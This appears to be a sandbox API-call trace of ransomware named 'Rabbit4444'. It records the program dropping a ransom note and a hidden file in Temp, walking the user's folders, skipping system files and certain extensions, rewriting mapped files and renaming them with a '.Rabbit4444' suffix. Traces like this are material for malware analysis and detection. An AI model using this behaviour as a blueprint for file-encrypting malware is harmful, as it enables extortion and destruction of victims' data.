lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc21df919, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc21df919, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x8c7bc13, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vedatamodel.jfm", cAlternateFileName="VEDATA~1.JFM")) returned 0 [0055.533] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0055.533] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.533] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.533] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.533] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.533] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.534] CloseHandle (hObject=0x278) returned 1 [0055.534] CloseHandle (hObject=0x27c) returned 1 [0055.534] GetCurrentThreadId () returned 0xd98 [0055.534] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6510 [0055.534] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" [0055.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b5b0 | out: hHeap=0xe0000) returned 1 [0055.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6508 | out: hHeap=0xe0000) returned 1 [0055.534] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" [0055.534] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\" [0055.534] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\.BFC0E91B00AE8A0620D3" [0055.534] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.536] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.539] FlushFileBuffers (hFile=0x27c) returned 1 [0055.540] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.540] CloseHandle (hObject=0x27c) returned 1 [0055.541] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned 34 [0055.541] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.541] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd91c6826, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea6be963, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0055.541] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.541] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.541] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.541] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.541] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd91c6826, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea6be963, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.541] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.541] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.541] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.541] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.541] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.541] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1404510, ftCreationTime.dwHighDateTime=0x1d4d1d5, ftLastAccessTime.dwLowDateTime=0x16837870, ftLastAccessTime.dwHighDateTime=0x1d4c721, ftLastWriteTime.dwLowDateTime=0x16837870, ftLastWriteTime.dwHighDateTime=0x1d4c721, nFileSizeHigh=0x0, nFileSizeLow=0x508f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-xgy F.avi", cAlternateFileName="-XGYF~1.AVI")) returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="Rabbit4444.exe") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2=".") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="..") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="windows") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="bootmgr") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="pagefile.sys") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="boot") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="ids.txt") returned 1 [0055.541] lstrcmpiW (lpString1="-xgy F.avi", lpString2="NTUSER.DAT") returned 1 [0055.541] lstrcpyW (in: lpString1=0x130eb7e, lpString2="-xgy F.avi" | out: lpString1="-xgy F.avi") returned="-xgy F.avi" [0055.541] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\-xgy F.avi", dwFileAttributes=0x0) returned 1 [0055.542] lstrlenW (lpString="-xgy F.avi") returned 10 [0055.542] lstrlenW (lpString="Rabbit4444") returned 10 [0055.542] lstrcmpiW (lpString1="-xgy F.avi", lpString2="Rabbit4444") returned 1 [0055.542] lstrlenW (lpString=".dll") returned 4 [0055.542] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0055.542] lstrlenW (lpString=".lnk") returned 4 [0055.542] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0055.542] lstrlenW (lpString=".ini") returned 4 [0055.542] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0055.542] lstrlenW (lpString=".sys") returned 4 [0055.542] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0055.542] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\-xgy F.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\-xgy f.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.542] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.542] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14685308155) returned 1 [0055.542] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=20623) returned 1 [0055.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0055.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0055.543] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5390, lpName=0x0) returned 0x298 [0055.543] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5390) returned 0x70000 [0055.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0055.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0055.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0055.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0055.544] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14685460469) returned 1 [0055.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0055.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0055.544] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.544] CloseHandle (hObject=0x298) returned 1 [0055.544] CloseHandle (hObject=0x278) returned 1 [0055.545] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\-xgy F.avi.Rabbit4444") returned 56 [0055.545] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\-xgy F.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\-xgy f.avi"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\-xgy F.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\-xgy f.avi.rabbit4444"), dwFlags=0x1) returned 1 [0055.545] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea6be963, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea6be963, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea6e48cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.545] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.545] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.545] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2be9c40, ftCreationTime.dwHighDateTime=0x1d4d5d5, ftLastAccessTime.dwLowDateTime=0xa91c7ed0, ftLastAccessTime.dwHighDateTime=0x1d4ca6d, ftLastWriteTime.dwLowDateTime=0xa91c7ed0, ftLastWriteTime.dwHighDateTime=0x1d4ca6d, nFileSizeHigh=0x0, nFileSizeLow=0x1293b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0xiOmO5gYWzu9YHVTaL.flv", cAlternateFileName="0XIOMO~1.FLV")) returned 1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="Rabbit4444.exe") returned -1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2=".") returned 1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="..") returned 1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="windows") returned -1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="bootmgr") returned -1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="pagefile.sys") returned -1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="boot") returned -1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="ids.txt") returned -1 [0055.546] lstrcmpiW (lpString1="0xiOmO5gYWzu9YHVTaL.flv", lpString2="NTUSER.DAT") returned -1 [0055.546] lstrcpyW (in: lpString1=0x130eb7e, lpString2="0xiOmO5gYWzu9YHVTaL.flv" | out: lpString1="0xiOmO5gYWzu9YHVTaL.flv") returned="0xiOmO5gYWzu9YHVTaL.flv" [0055.546] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0xiOmO5gYWzu9YHVTaL.flv", dwFileAttributes=0x0) returned 1 [0055.546] lstrlenW (lpString="0xiOmO5gYWzu9YHVTaL.flv") returned 23 [0055.546] lstrlenW (lpString="Rabbit4444") returned 10 [0055.546] lstrcmpiW (lpString1="YHVTaL.flv", lpString2="Rabbit4444") returned 1 [0055.546] lstrlenW (lpString=".dll") returned 4 [0055.546] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0055.546] lstrlenW (lpString=".lnk") returned 4 [0055.546] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0055.546] lstrlenW (lpString=".ini") returned 4 [0055.546] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0055.546] lstrlenW (lpString=".sys") returned 4 [0055.546] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0055.546] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0xiOmO5gYWzu9YHVTaL.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\0xiomo5gywzu9yhvtal.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.547] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.547] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14685731216) returned 1 [0055.547] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=76091) returned 1 [0055.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0055.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0055.547] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12c40, lpName=0x0) returned 0x298 [0055.547] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12c40) returned 0x70000 [0055.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0055.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0055.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0055.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0055.549] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14685982030) returned 1 [0055.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0055.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0055.549] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.550] CloseHandle (hObject=0x298) returned 1 [0055.550] CloseHandle (hObject=0x278) returned 1 [0055.551] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0xiOmO5gYWzu9YHVTaL.flv.Rabbit4444") returned 69 [0055.551] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0xiOmO5gYWzu9YHVTaL.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\0xiomo5gywzu9yhvtal.flv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0xiOmO5gYWzu9YHVTaL.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\0xiomo5gywzu9yhvtal.flv.rabbit4444"), dwFlags=0x1) returned 1 [0055.551] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6437a100, ftCreationTime.dwHighDateTime=0x1d4d387, ftLastAccessTime.dwLowDateTime=0x6612a6b0, ftLastAccessTime.dwHighDateTime=0x1d4d1d3, ftLastWriteTime.dwLowDateTime=0x6612a6b0, ftLastWriteTime.dwHighDateTime=0x1d4d1d3, nFileSizeHigh=0x0, nFileSizeLow=0x13a39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2oF0Av0QrLDtDkD.wav", cAlternateFileName="2OF0AV~1.WAV")) returned 1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="Rabbit4444.exe") returned -1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2=".") returned 1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="..") returned 1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="windows") returned -1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="bootmgr") returned -1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="pagefile.sys") returned -1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="boot") returned -1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="ids.txt") returned -1 [0055.551] lstrcmpiW (lpString1="2oF0Av0QrLDtDkD.wav", lpString2="NTUSER.DAT") returned -1 [0055.551] lstrcpyW (in: lpString1=0x130eb7e, lpString2="2oF0Av0QrLDtDkD.wav" | out: lpString1="2oF0Av0QrLDtDkD.wav") returned="2oF0Av0QrLDtDkD.wav" [0055.552] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\2oF0Av0QrLDtDkD.wav", dwFileAttributes=0x0) returned 1 [0055.552] lstrlenW (lpString="2oF0Av0QrLDtDkD.wav") returned 19 [0055.552] lstrlenW (lpString="Rabbit4444") returned 10 [0055.552] lstrcmpiW (lpString1="LDtDkD.wav", lpString2="Rabbit4444") returned -1 [0055.552] lstrlenW (lpString=".dll") returned 4 [0055.552] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0055.552] lstrlenW (lpString=".lnk") returned 4 [0055.552] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0055.552] lstrlenW (lpString=".ini") returned 4 [0055.552] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0055.552] lstrlenW (lpString=".sys") returned 4 [0055.552] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0055.552] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\2oF0Av0QrLDtDkD.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\2of0av0qrldtdkd.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.552] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.552] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14686296802) returned 1 [0055.552] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=80441) returned 1 [0055.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0055.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0055.552] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13d40, lpName=0x0) returned 0x298 [0055.552] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13d40) returned 0x70000 [0055.555] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.555] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0055.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.555] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0055.555] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0055.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0055.555] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14686602009) returned 1 [0055.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0055.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0055.555] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.556] CloseHandle (hObject=0x298) returned 1 [0055.556] CloseHandle (hObject=0x278) returned 1 [0055.557] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\2oF0Av0QrLDtDkD.wav.Rabbit4444") returned 65 [0055.557] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\2oF0Av0QrLDtDkD.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\2of0av0qrldtdkd.wav"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\2oF0Av0QrLDtDkD.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\2of0av0qrldtdkd.wav.rabbit4444"), dwFlags=0x1) returned 1 [0055.557] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98dd9800, ftCreationTime.dwHighDateTime=0x1d4cb6d, ftLastAccessTime.dwLowDateTime=0x776dccc0, ftLastAccessTime.dwHighDateTime=0x1d4cc0e, ftLastWriteTime.dwLowDateTime=0x776dccc0, ftLastWriteTime.dwHighDateTime=0x1d4cc0e, nFileSizeHigh=0x0, nFileSizeLow=0x16b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5s306805lW9yY5.flv", cAlternateFileName="5S3068~1.FLV")) returned 1 [0055.557] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.557] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.557] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="Rabbit4444.exe") returned -1 [0055.557] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2=".") returned 1 [0055.557] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="..") returned 1 [0055.557] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="windows") returned -1 [0055.558] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="bootmgr") returned -1 [0055.558] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="pagefile.sys") returned -1 [0055.558] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="boot") returned -1 [0055.558] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="ids.txt") returned -1 [0055.558] lstrcmpiW (lpString1="5s306805lW9yY5.flv", lpString2="NTUSER.DAT") returned -1 [0055.558] lstrcpyW (in: lpString1=0x130eb7e, lpString2="5s306805lW9yY5.flv" | out: lpString1="5s306805lW9yY5.flv") returned="5s306805lW9yY5.flv" [0055.558] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\5s306805lW9yY5.flv", dwFileAttributes=0x0) returned 1 [0055.558] lstrlenW (lpString="5s306805lW9yY5.flv") returned 18 